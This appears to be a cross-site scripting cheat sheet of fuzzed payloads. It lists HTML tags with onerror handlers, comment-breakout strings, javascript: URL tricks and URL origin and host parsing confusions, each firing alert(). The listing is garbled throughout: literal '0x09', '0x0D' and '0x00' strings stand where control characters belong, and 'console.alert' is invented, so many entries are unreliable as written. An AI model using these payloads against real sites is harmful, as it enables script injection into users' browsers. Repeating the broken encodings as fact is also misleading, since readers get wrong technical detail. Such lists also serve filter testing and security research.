Cheat Sheet

<! <a/b="--><img/src/onerror=alert(1)>"

</ <a/b="--><img/src/onerror=alert(1)>"

<? <a/b="--><img/src/onerror=alert(1)>"

if (new URL("https://google.com0x090x09/endpoint").origin=="https://google.com"){alert(9)}

if (new URL("https://google.com##/endpoint").origin=="https://google.com"){alert(35)}

if (new URL("https://google.com///endpoint").origin=="https://google.com"){alert(47)}

if (new URL("https://google.com??/endpoint").origin=="https://google.com"){alert(63)}

if (new URL("https://google.com\\/endpoint").origin=="https://google.com"){alert(92)}

<p><img/src/onerror=alert(1)></p>

if (new URL("javascript0x09:alert()").protocol=="javascript:"){alert(9)}

if (new URL("javascript::alert()").protocol=="javascript:"){alert(58)}

if (new URL("javascript\:alert()").protocol=="javascript:"){alert(92)}

<iframe src='data:application/xml,<?xml version="1.0" encoding="UTF-8"0x00><x:script xmlns:x="http://www.w3.org/1999/xhtml">window.parent.postMessage("0x00","*")</x:script>'></iframe>0x0D
<script>0x0D
  window.addEventListener('message', e => console.alert(e.data));0x0D
</script>

eval('""');alert(34);

<img0x09src=x0x09onerror=alert(9)>

<img
src=x
onerror=alert(10)>

<img0x0Csrc=x0x0Conerror=alert(12)>

<img0x0Dsrc=x0x0Donerror=alert(13)>

<img src=x onerror=alert(32)>

<input  id="test" value="s0x00onload="alert(1)" />

if (['https:'].includes("\https:")){0x0D
    alert(92)0x0D
}

<div><img/src/onerror=alert(1)></div>

<img src=x><img/src/onerror=alert(1)>

<img src=0x09x0x09onerror=alert(9)>

<img src=
x
onerror=alert(10)>

<img src=0x0Cx0x0Conerror=alert(12)>

<img src=0x0Dx0x0Donerror=alert(13)>

<img src= x onerror=alert(32)>

<!----!>><img/src/onerror=alert(1)>

char = String.fromCodePoint(0,0)0x0D
url = "javascript://"+char+"google.com"0x0D
0x0D
try {0x0D
    new URL(url)0x0D
}0x0D
catch(e){0x0D
   pwn(url,char)0x0D
 }0x0D
0x0D
function pwn(url,char){0x0D
   try{0x0D
 window.open(url)0x0D
 console.alert("shirley");0x0D
alert(0,0)0x0D
 }catch(e){0x0D
}0x0D
}

if (new URL("https://0x09localhost/endpoint").host == "localhost") {0x0D
    alert(9);0x0D
}

if (new URL("https:///localhost/endpoint").host == "localhost") {0x0D
    alert(47);0x0D
}

if (new URL("https://@localhost/endpoint").host == "localhost") {0x0D
    alert(64);0x0D
}

if (new URL("https://\localhost/endpoint").host == "localhost") {0x0D
    alert(92);0x0D
}

if (new URL("https://­localhost/endpoint").host == "localhost") {0x0D
    alert(173);0x0D
}

<img src0x09=data:text/plain, id="testImg">

<img src
=data:text/plain, id="testImg">

<img src0x0C=data:text/plain, id="testImg">

<img src0x0D=data:text/plain, id="testImg">

<img src =data:text/plain, id="testImg">

<div style="color:red">test</div>

document.body.innerHTML = String.fromCodePoint(60) + "img src=x onerror=alert(60)  />";

$:alert(36)

_:alert(95)

ª:alert(170)

µ:alert(181)

0 > 0x7f && normalizationForms.forEach(form => {0x0D
    const normalized = String.fromCodePoint(0).normalize(form);0x0D
    for(let charToCheck of charsToCheck) {0x0D
       if(charToCheck === normalized) {0x0D
            alert(String.fromCodePoint(0)+"("+form+")"+"="+charToCheck);0x0D
        }0x0D
     }0x0D
})